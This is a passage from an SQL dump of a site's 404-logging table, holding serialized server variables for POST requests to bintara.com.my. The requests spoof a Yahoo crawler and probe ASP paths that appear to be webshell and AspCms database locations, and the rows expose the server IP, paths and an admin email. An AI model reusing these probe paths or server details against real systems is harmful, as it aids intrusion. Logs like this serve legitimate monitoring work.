Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"219.147.217.126\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"219.147.217.126\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-AYK6CYj3S7An3VFFejQAAAUs\";s:12:\"REDIRECT_URL\";s:16:\"/admin/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63247\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/index.asp\";s:10:\"SCRIPT_URL\";s:16:\"/admin/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-AYK6CYj3S7An3VFFejQAAAUs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571799136.659\";s:12:\"REQUEST_TIME\";s:10:\"1571799136\";}}','notice','2019-10-23 02:52:24','2019-10-23 02:52:17',35342528,37138728,'http://bintara.com.my//admin/index.asp',1,0,'219.147.217.126'),(28760,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admin/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"685\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"211.136.68.236\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"211.136.68.236\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-AZ@HARMCuuKQiJT-0JgAAAMg\";s:12:\"REDIRECT_URL\";s:16:\"/admin/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63587\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/index.asp\";s:10:\"SCRIPT_URL\";s:16:\"/admin/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-AZ@HARMCuuKQiJT-0JgAAAMg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571799143.5483\";s:12:\"REQUEST_TIME\";s:10:\"1571799143\";}}','notice','2019-10-23 02:52:25','2019-10-23 02:52:24',35270072,37078216,'http://bintara.com.my//admin/index.asp',1,0,'211.136.68.236'),(28761,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//%20%20/yoududao.aSP\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"220.200.139.136\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"220.200.139.136\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/  /yoududao.aSP\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/  /yoududao.aSP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-AheHARMCuuKQiJT-0WgAAANQ\";s:12:\"REDIRECT_URL\";s:16:\"/  /yoududao.aSP\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63180\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/  /yoududao.aSP\";s:10:\"SCRIPT_URL\";s:16:\"/  /yoududao.aSP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-AheHARMCuuKQiJT-0WgAAANQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571799173.4997\";s:12:\"REQUEST_TIME\";s:10:\"1571799173\";}}','notice','2019-10-23 02:52:55','2019-10-23 02:52:53',35342216,37146696,'http://bintara.com.my//%20%20/yoududao.aSP',1,0,'220.200.139.136'),(28762,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//%20%20/yoududao.aSP\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"210.53.194.88\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"210.53.194.88\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/  /yoududao.aSP\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/  /yoududao.aSP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-AjK6CYj3S7An3VFFeogAAAUs\";s:12:\"REDIRECT_URL\";s:16:\"/  /yoududao.aSP\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63495\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/  /yoududao.aSP\";s:10:\"SCRIPT_URL\";s:16:\"/  /yoududao.aSP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-AjK6CYj3S7An3VFFeogAAAUs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571799181.0244\";s:12:\"REQUEST_TIME\";s:10:\"1571799181\";}}','notice','2019-10-23 02:53:03','2019-10-23 02:53:01',35271072,37073984,'http://bintara.com.my//%20%20/yoududao.aSP',1,0,'210.53.194.88'),(28763,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//%20%20/yoududao.aSP\";s:14:\"CONTENT_LENGTH\";s:3:\"492\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"116.90.187.53\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"116.90.187.53\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/  /yoududao.aSP\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/  /yoududao.aSP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-AlOHARMCuuKQiJT-0XAAAAMI\";s:12:\"REDIRECT_URL\";s:16:\"/  /yoududao.aSP\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63768\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/  /yoududao.aSP\";s:10:\"SCRIPT_URL\";s:16:\"/  /yoududao.aSP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-AlOHARMCuuKQiJT-0XAAAAMI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571799188.1415\";s:12:\"REQUEST_TIME\";s:10:\"1571799188\";}}','notice','2019-10-23 02:53:10','2019-10-23 02:53:08',35268552,37067296,'http://bintara.com.my//%20%20/yoududao.aSP',1,0,'116.90.187.53'),(28764,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//data/%23AspCms253.asa\";s:14:\"CONTENT_LENGTH\";s:3:\"296\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"210.82.65.98\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"210.82.65.98\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/data/#AspCms253.asa\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/data/#AspCms253.asa\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-Apa6CYj3S7An3VFFesAAAAU0\";s:12:\"REDIRECT_URL\";s:20:\"/data/#AspCms253.asa\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.164\";s:11:\"REMOTE_PORT\";s:5:\"59454\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/data/#AspCms253.asa\";s:10:\"SCRIPT_URL\";s:20:\"/data/#AspCms253.asa\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-Apa6CYj3S7An3VFFesAAAAU0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571799205.3707\";s:12:\"REQUEST_TIME\";s:10:\"1571799205\";}}','notice','2019-10-23 02:53:28','2019-10-23 02:53:25',35265288,37062856,'http://bintara.com.my//data/%23AspCms253.asa',1,0,'210.82.65.98'),(28765,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//data/%23AspCms253.asa\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"220.207.233.58\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"220.207.233.58\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/data/#AspCms253.asa\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/data/#AspCms253.asa\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-AseHARMCuuKQiJT-0ZgAAANY\";s:12:\"REDIRECT_URL\";s:20:\"/data/#AspCms253.asa\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.164\";s:11:\"REMOTE_PORT\";s:5:\"59832\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/data/#AspCms253.asa\";s:10:\"SCRIPT_URL\";s:20:\"/data/#AspCms253.asa\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-AseHARMCuuKQiJT-0ZgAAANY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571799217.9616\";s:12:\"REQUEST_TIME\";s:10:\"1571799217\";}}','notice','2019-10-23 02:53:40','2019-10-23 02:53:38',35340488,37136832,'http://bintara.com.my//data/%23AspCms253.asa',1,0,'220.207.233.58'),(28766,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//data/%23AspCms253.asa\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"123.253.142.96\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"123.253.142.96\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/data/#AspCms253.asa\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/data/#AspCms253.asa\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-Au66CYj3S7An3VFFetwAAAUI\";s:12:\"REDIRECT_URL\";s:20:\"/data/#AspCms253.asa\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.164\";s:11:\"REMOTE_PORT\";s:5:\"59985\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/data/#AspCms253.asa\";s:10:\"SCRIPT_URL\";s:20:\"/data/#AspCms253.asa\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-Au66CYj3S7An3VFFetwAAAUI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571799227.6546\";s:12:\"REQUEST_TIME\";s:10:\"1571799227\";}}','notice','2019-10-23 02:53:50','2019-10-23 02:53:48',35271624,37080240,'http://bintara.com.my//data/%23AspCms253.asa',1,0,'123.253.142.96'),(28767,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//main/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"821\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"61.146.41.82\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"61.146.41.82\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/main/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/main/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-Aza6CYj3S7An3VFFewAAAAU4\";s:12:\"REDIRECT_URL\";s:15:\"/main/index.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.164\";s:11:\"REMOTE_PORT\";s:5:\"60336\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/main/index.asp\";s:10:\"SCRIPT_URL\";s:15:\"/main/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-Aza6CYj3S7An3VFFewAAAAU4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571799246.004\";s:12:\"REQUEST_TIME\";s:10:\"1571799246\";}}','notice','2019-10-23 02:54:08','2019-10-23 02:54:06',35340608,37129248,'http://bintara.com.my//main/index.asp',1,0,'61.146.41.82'),(28768,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//main/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"686\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 